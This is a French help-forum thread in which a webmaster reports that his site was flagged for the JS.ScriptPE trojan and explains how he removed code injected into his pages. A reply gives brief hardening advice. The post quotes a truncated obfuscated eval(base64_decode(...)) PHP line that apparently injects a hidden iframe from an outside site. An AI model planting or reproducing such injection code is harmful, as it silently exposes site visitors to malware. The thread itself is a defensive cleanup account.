JS.ScriptPE-inf [Trj] - Débarassez-vous en!

Résolu/Fermé
salimdrame Messages postés 70 Date d'inscription lundi 7 avril 2008 Statut Membre Dernière intervention 24 juin 2011 - 13 mars 2010 à 21:40
avion-f16 Messages postés 19243 Date d'inscription dimanche 17 février 2008 Statut Contributeur Dernière intervention 8 avril 2024 - 13 mars 2010 à 21:46
Bonjour,

J'ai constaté ce matin en consultant mon site qu'il avait fait l'objet d'une attaque qui se caractérise, pour ceux qui utilisent Avast comme antivirus, par une alerte qui s'affiche et le blocage de l'accès au site en question. L'alerte vous notifie qu'il s'agit d'un trojan nommé "JS.ScriptPE-inf [Trj]".
Mon premier réflexe a été de télécharger mon site en entier, d'effacer la version existante du serveur, de scanner la version sur mon ordinateur avec deux anti-virus différents puis de re-uploader le site web sur le serveur. Cela n'a pas régler le problème. J'ai donc appeler mon hébergeur aux USA qui m'informe qu'il s'agit d'une injection de code dans mon script après quelques minutes au téléphone.
J'ai donc analyser mon code et à ma grande surprise je trouve de grandes portions de code PHP au top de plusieurs pages dont voici une infime partie que j'ai immédiatement enlever :

<?php /**/ eval(base64_decode("[...]3OCU3OCUyRSU2RiU3MiU2NyUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAg[...]"));?>

Mon site marche de nouveau, reste à renforcer la sécurité. Je vous retransmet un conseil que mon hébergeur ma donné, CHOISISSEZ UN MOT DE PASSE SÉCURISER POUR VOTRE FTP.

Je n'ai pas eu la chance de trouver une réponse à ce problème en français. J'espère donc que ce post aidera plus d'un.

Bonne chance!
A voir également:

1 réponse

avion-f16 Messages postés 19243 Date d'inscription dimanche 17 février 2008 Statut Contributeur Dernière intervention 8 avril 2024 4 496
Modifié par avion-f16 le 13/03/2010 à 21:47
Forcément si tu inclues des scripts JS provenant de sites pas très nets ...
Pour éviter que tes internautes insèrent des scripts via tes formulaires, utiliser htmlspecialchars() en PHP.

Ton ordinateur ne fait pas ce que tu veux ... mais ce que tu lui dis de faire.
0